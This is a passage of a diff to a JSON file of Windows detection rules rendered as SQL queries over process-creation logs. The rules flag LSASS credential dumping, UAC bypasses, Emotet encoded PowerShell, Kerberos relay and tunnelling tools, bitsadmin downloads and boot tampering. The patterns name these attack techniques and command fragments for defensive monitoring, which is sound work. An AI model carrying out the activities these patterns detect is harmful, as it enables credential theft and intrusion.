Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" - }, - { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_hktl_dinjector.yml" - }, - { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { "title": "Potential SMB Relay Attack Tool Execution", @@ -10386,26 +10023,6 @@ ], "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, - { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, { "title": "HackTool - winPEAS Execution", "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", @@ -10428,43 +10045,63 @@ "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + }, + { + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { "title": "Fireball Archer Install", @@ -10487,241 +10124,222 @@ "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", - "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child processes by different system processes", + "author": "Semanur Guneysu @semanurtg, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "title": "Winnti Pipemon Characteristics", + "id": "73d70463-75c9-4258-92c6-17500fe972f2", "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate setups that use similar flags" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_apt_winnti_pipemon.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "PUA - Chisel Tunneling Tool Execution", + "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "status": "experimental", + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Some false positives may occur with other tools with similar commandlines" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_pua_chisel.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", - "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "title": "Cmd.EXE Missing Space Characters Execution Anomaly", + "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "status": "experimental", + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE '\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_cmd_no_space_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", + "title": "Bypass UAC via Fodhelper.exe", + "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", "attack.t1548.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of fodhelper.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_uac_bypass_fodhelper.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Raspberry Robin Dot Ending File", + "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "status": "experimental", + "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE", + "id": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "status": "test", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\dnscmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/config%' ESCAPE '\\' AND CommandLine LIKE '%/serverlevelplugindll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml" }, { - "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "title": "Invoke-Obfuscation Via Use Clip", + "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", "status": "test", - "description": "Detects new commands that add new printer port which point to suspicious file", - "author": "EagleEye Team, Florian Roth", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "New printer port install on host" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2020_1048.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", - "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Boot Configuration Tampering Via Bcdedit.EXE", + "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", + "status": "stable", + "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "title": "PUA - RunXCmd Execution", + "id": "93199800-b52a-4dec-b762-75212c196542", "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", + "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.t1569.002", + 